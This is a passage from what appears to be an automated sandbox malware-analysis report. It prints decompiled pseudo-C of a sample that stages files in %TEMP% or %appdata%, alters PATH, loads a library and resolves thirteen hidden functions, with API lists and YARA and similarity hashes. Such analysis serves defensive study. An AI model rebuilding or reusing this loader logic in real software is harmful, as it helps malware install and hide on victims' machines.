                                                                                                                                                                                          				 *[fs:edx] = _t32 + 0xfffffff0;
                                                                                                                                                                                          				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                                                                                                                                                          				E00403748( &_v20, 7,  &_v15);
                                                                                                                                                                                          				E00402988(_v20,  &_v8);
                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t29);
                                                                                                                                                                                          				 *[fs:eax] = _t29;
                                                                                                                                                                                          				_push(E00404BB9);
                                                                                                                                                                                          				return E004034E4( &_v20);
                                                                                                                                                                                          			}









                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00407A34() {
                                                                                                                                                                                          
                                                                                                                                                                                          				return  *[fs:0x30];
                                                                                                                                                                                          			}




                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E0040831C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                          				char _v104;
                                                                                                                                                                                          				char _v108;
                                                                                                                                                                                          				char _v112;
                                                                                                                                                                                          				intOrPtr _v117;
                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                          				intOrPtr* _t97;
                                                                                                                                                                                          				intOrPtr* _t103;
                                                                                                                                                                                          				intOrPtr* _t108;
                                                                                                                                                                                          				intOrPtr* _t211;
                                                                                                                                                                                          				void* _t226;
                                                                                                                                                                                          				intOrPtr _t244;
                                                                                                                                                                                          				void* _t270;
                                                                                                                                                                                          				intOrPtr _t272;
                                                                                                                                                                                          				intOrPtr _t273;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t269 = __esi;
                                                                                                                                                                                          				 *__eax =  *__eax + __eax;
                                                                                                                                                                                          				_t69 = __eax +  *__eax;
                                                                                                                                                                                          				 *_t69 =  *_t69 + _t69;
                                                                                                                                                                                          				asm("das");
                                                                                                                                                                                          				 *_t69 =  *_t69 + _t69;
                                                                                                                                                                                          				_v117 = _v117 + __edx;
                                                                                                                                                                                          				_t272 = _t273;
                                                                                                                                                                                          				_t226 = 0xd;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t226 = _t226 - 1;
                                                                                                                                                                                          					_t277 = _t226;
                                                                                                                                                                                          				} while (_t226 != 0);
                                                                                                                                                                                          				_push(_t226);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_v8 = _t69;
                                                                                                                                                                                          				E00403980(_v8);
                                                                                                                                                                                          				_push(_t272);
                                                                                                                                                                                          				_push(0x408781);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t273;
                                                                                                                                                                                          				 *0x41b0d8 = 0;
                                                                                                                                                                                          				E00406C4C( &_v28, 0x41c7bc, __esi);
                                                                                                                                                                                          				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t277);
                                                                                                                                                                                          				E00406258(_v24, 0x41c7bc,  &_v20, _t269, _t277);
                                                                                                                                                                                          				E00403D2C( &_v16, _v20);
                                                                                                                                                                                          				_push(L"%TEMP%\\");
                                                                                                                                                                                          				_push(_v16);
                                                                                                                                                                                          				_push(0x4087a8);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E004062D8(_v36,  &_v32, _t277);
                                                                                                                                                                                          				E00403BBC(0x41c7c0, _v32);
                                                                                                                                                                                          				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                          				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t277);
                                                                                                                                                                                          				E0040813C(9,  &_v44);
                                                                                                                                                                                          				E00403DB8( &_v40, _v44,  *0x41c7c0, _t277);
                                                                                                                                                                                          				_t96 = E004076B0(_v40, 0x41c7bc, _v44);
                                                                                                                                                                                          				_t278 = _t96;
                                                                                                                                                                                          				if(_t96 == 0) {
                                                                                                                                                                                          					_push(L"%appdata%\\");
                                                                                                                                                                                          					_push(_v16);
                                                                                                                                                                                          					_push(0x4087a8);
                                                                                                                                                                                          					E00403E1C();
                                                                                                                                                                                          					E004062D8(_v52,  &_v48, _t278);
                                                                                                                                                                                          					E00403BBC(0x41c7c0, _v48);
                                                                                                                                                                                          					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                          					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t278);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t97 =  *0x41b578; // 0x41c6b0
                                                                                                                                                                                          				_t270 =  *((intOrPtr*)( *_t97))(L"PATH", 0, 0);
                                                                                                                                                                                          				_t279 = _t270;
                                                                                                                                                                                          				if(_t270 > 0) {
                                                                                                                                                                                          					E004040B0( &_v12, _t270);
                                                                                                                                                                                          					_t211 =  *0x41b578; // 0x41c6b0
                                                                                                                                                                                          					 *((intOrPtr*)( *_t211))(L"PATH", E00403D3C(_v12), _t270);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				_t103 =  *0x41b614; // 0x41c6ac
                                                                                                                                                                                          				 *((intOrPtr*)( *_t103))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
                                                                                                                                                                                          				_t108 =  *0x41b5e4; // 0x41c6b4
                                                                                                                                                                                          				 *((intOrPtr*)( *_t108))(E00403D3C( *0x41c7c0));
                                                                                                                                                                                          				E0040813C(9,  &_v60);
                                                                                                                                                                                          				E00403DB8( &_v56, _v60,  *0x41c7c0, _t279);
                                                                                                                                                                                          				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
                                                                                                                                                                                          				if( *0x41c7bc != 0) {
                                                                                                                                                                                          					E00408120(0x84,  &_v64);
                                                                                                                                                                                          					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
                                                                                                                                                                                          					E00408120(0x85,  &_v68);
                                                                                                                                                                                          					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
                                                                                                                                                                                          					E00408120(0x86,  &_v72);
                                                                                                                                                                                          					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
                                                                                                                                                                                          					E00408120(0x87,  &_v76);
                                                                                                                                                                                          					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
                                                                                                                                                                                          					E00408120(0x88,  &_v80);
                                                                                                                                                                                          					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
                                                                                                                                                                                          					E00408120(0x89,  &_v84);
                                                                                                                                                                                          					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
                                                                                                                                                                                          					E00408120(0x8a,  &_v88);
                                                                                                                                                                                          					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
                                                                                                                                                                                          					E00408120(0x12,  &_v92);
                                                                                                                                                                                          					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
                                                                                                                                                                                          					E00408120(0x13,  &_v96);
                                                                                                                                                                                          					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
                                                                                                                                                                                          					E00408120(0x14,  &_v100);
                                                                                                                                                                                          					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
                                                                                                                                                                                          					E00408120(0x15,  &_v104);
                                                                                                                                                                                          					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
                                                                                                                                                                                          					E00408120(0x16,  &_v108);
                                                                                                                                                                                          					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
                                                                                                                                                                                          					E00408120(0x17,  &_v112);
                                                                                                                                                                                          					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
                                                                                                                                                                                          					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
                                                                                                                                                                                          						 *0x41b0d8 = 1;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t244);
                                                                                                                                                                                          				 *[fs:eax] = _t244;
                                                                                                                                                                                          				_push(E00408788);
                                                                                                                                                                                          				E00403508( &_v112, 0xd);
                                                                                                                                                                                          				E00403B98( &_v60, 8);
                                                                                                                                                                                          				E00403508( &_v28, 3);
                                                                                                                                                                                          				E00403B98( &_v16, 2);
                                                                                                                                                                                          				return E004034E4( &_v8);
                                                                                                                                                                                          			}










































                                                                                                                                                                                          0x0040864d
                                                                                                                                                                                          0x0040865a
                                                                                                                                                                                          0x00408670
                                                                                                                                                                                          0x0040867d
                                                                                                                                                                                          0x00408693
                                                                                                                                                                                          0x004086a0
                                                                                                                                                                                          0x004086b6
                                                                                                                                                                                          0x004086c2
                                                                                                                                                                                          0x00408730
                                                                                                                                                                                          0x00408730
                                                                                                                                                                                          0x004086c2
                                                                                                                                                                                          0x00408739
                                                                                                                                                                                          0x0040873c
                                                                                                                                                                                          0x0040873f
                                                                                                                                                                                          0x0040874c
                                                                                                                                                                                          0x00408759
                                                                                                                                                                                          0x00408766
                                                                                                                                                                                          0x00408773
                                                                                                                                                                                          0x00408780

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                          • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                          • API String ID: 1305945209-1089150275
                                                                                                                                                                                          • Opcode ID: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
                                                                                                                                                                                          • Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
                                                                                                                                                                                          • Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00408324(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                          				char _v104;
                                                                                                                                                                                          				char _v108;
                                                                                                                                                                                          				char _v112;
                                                                                                                                                                                          				intOrPtr _v117;
                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                          				intOrPtr* _t96;
                                                                                                                                                                                          				intOrPtr* _t102;
                                                                                                                                                                                          				intOrPtr* _t107;
                                                                                                                                                                                          				intOrPtr* _t210;
                                                                                                                                                                                          				void* _t225;
                                                                                                                                                                                          				intOrPtr _t243;
                                                                                                                                                                                          				void* _t269;
                                                                                                                                                                                          				intOrPtr _t271;
                                                                                                                                                                                          				intOrPtr _t272;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t268 = __esi;
                                                                                                                                                                                          				asm("das");
                                                                                                                                                                                          				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                                                                                                                                                                                          				_v117 = _v117 + __edx;
                                                                                                                                                                                          				_t271 = _t272;
                                                                                                                                                                                          				_t225 = 0xd;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t225 = _t225 - 1;
                                                                                                                                                                                          					_t274 = _t225;
                                                                                                                                                                                          				} while (_t225 != 0);
                                                                                                                                                                                          				_push(_t225);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E00403980(_v8);
                                                                                                                                                                                          				_push(_t271);
                                                                                                                                                                                          				_push(0x408781);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t272;
                                                                                                                                                                                          				 *0x41b0d8 = 0;
                                                                                                                                                                                          				E00406C4C( &_v28, 0x41c7bc, __esi);
                                                                                                                                                                                          				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t274);
                                                                                                                                                                                          				E00406258(_v24, 0x41c7bc,  &_v20, _t268, _t274);
                                                                                                                                                                                          				E00403D2C( &_v16, _v20);
                                                                                                                                                                                          				_push(L"%TEMP%\\");
                                                                                                                                                                                          				_push(_v16);
                                                                                                                                                                                          				_push(0x4087a8);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E004062D8(_v36,  &_v32, _t274);
                                                                                                                                                                                          				E00403BBC(0x41c7c0, _v32);
                                                                                                                                                                                          				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                          				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t274);
                                                                                                                                                                                          				E0040813C(9,  &_v44);
                                                                                                                                                                                          				E00403DB8( &_v40, _v44,  *0x41c7c0, _t274);
                                                                                                                                                                                          				_t95 = E004076B0(_v40, 0x41c7bc, _v44);
				_t275 = _t95;
				if(_t95 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t275);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t275);
				}
				_t96 =  *0x41b578; // 0x41c6b0
				_t269 =  *((intOrPtr*)( *_t96))(L"PATH", 0, 0);
				_t276 = _t269;
				if(_t269 > 0) {
					E004040B0( &_v12, _t269);
					_t210 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t210))(L"PATH", E00403D3C(_v12), _t269);
				}
				E00403E1C();
				_t102 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t102))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				_t107 =  *0x41b5e4; // 0x41c6b4
				 *((intOrPtr*)( *_t107))(E00403D3C( *0x41c7c0));
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t276);
				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t243);
				 *[fs:eax] = _t243;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                          • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                          • API String ID: 1305945209-1089150275
                                                                                                                                                                                          • Opcode ID: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
                                                                                                                                                                                          • Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E00408328(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                          				char _v104;
                                                                                                                                                                                          				char _v108;
                                                                                                                                                                                          				char _v112;
                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                          				intOrPtr* _t94;
                                                                                                                                                                                          				intOrPtr* _t100;
                                                                                                                                                                                          				intOrPtr* _t105;
                                                                                                                                                                                          				intOrPtr* _t208;
                                                                                                                                                                                          				void* _t223;
                                                                                                                                                                                          				intOrPtr _t241;
                                                                                                                                                                                          				void* _t267;
                                                                                                                                                                                          				intOrPtr _t269;
                                                                                                                                                                                          				intOrPtr _t270;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t266 = __esi;
                                                                                                                                                                                          				_t269 = _t270;
                                                                                                                                                                                          				_t223 = 0xd;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t223 = _t223 - 1;
                                                                                                                                                                                          					_t271 = _t223;
                                                                                                                                                                                          				} while (_t223 != 0);
                                                                                                                                                                                          				_push(_t223);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E00403980(_v8);
                                                                                                                                                                                          				_push(_t269);
                                                                                                                                                                                          				_push(0x408781);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t270;
                                                                                                                                                                                          				 *0x41b0d8 = 0;
                                                                                                                                                                                          				E00406C4C( &_v28, 0x41c7bc, __esi);
                                                                                                                                                                                          				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t271);
                                                                                                                                                                                          				E00406258(_v24, 0x41c7bc,  &_v20, _t266, _t271);
                                                                                                                                                                                          				E00403D2C( &_v16, _v20);
                                                                                                                                                                                          				_push(L"%TEMP%\\");
                                                                                                                                                                                          				_push(_v16);
                                                                                                                                                                                          				_push(0x4087a8);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E004062D8(_v36,  &_v32, _t271);
                                                                                                                                                                                          				E00403BBC(0x41c7c0, _v32);
                                                                                                                                                                                          				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                          				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t271);
                                                                                                                                                                                          				E0040813C(9,  &_v44);
                                                                                                                                                                                          				E00403DB8( &_v40, _v44,  *0x41c7c0, _t271);
                                                                                                                                                                                          				_t93 = E004076B0(_v40, 0x41c7bc, _v44);
                                                                                                                                                                                          				_t272 = _t93;
                                                                                                                                                                                          				if(_t93 == 0) {
                                                                                                                                                                                          					_push(L"%appdata%\\");
                                                                                                                                                                                          					_push(_v16);
                                                                                                                                                                                          					_push(0x4087a8);
                                                                                                                                                                                          					E00403E1C();
                                                                                                                                                                                          					E004062D8(_v52,  &_v48, _t272);
                                                                                                                                                                                          					E00403BBC(0x41c7c0, _v48);
                                                                                                                                                                                          					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                          					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t272);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t94 =  *0x41b578; // 0x41c6b0
                                                                                                                                                                                          				_t267 =  *((intOrPtr*)( *_t94))(L"PATH", 0, 0);
                                                                                                                                                                                          				_t273 = _t267;
                                                                                                                                                                                          				if(_t267 > 0) {
                                                                                                                                                                                          					E004040B0( &_v12, _t267);
                                                                                                                                                                                          					_t208 =  *0x41b578; // 0x41c6b0
                                                                                                                                                                                          					 *((intOrPtr*)( *_t208))(L"PATH", E00403D3C(_v12), _t267);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				_t100 =  *0x41b614; // 0x41c6ac
                                                                                                                                                                                          				 *((intOrPtr*)( *_t100))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
                                                                                                                                                                                          				_t105 =  *0x41b5e4; // 0x41c6b4
                                                                                                                                                                                          				 *((intOrPtr*)( *_t105))(E00403D3C( *0x41c7c0));
                                                                                                                                                                                          				E0040813C(9,  &_v60);
                                                                                                                                                                                          				E00403DB8( &_v56, _v60,  *0x41c7c0, _t273);
                                                                                                                                                                                          				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
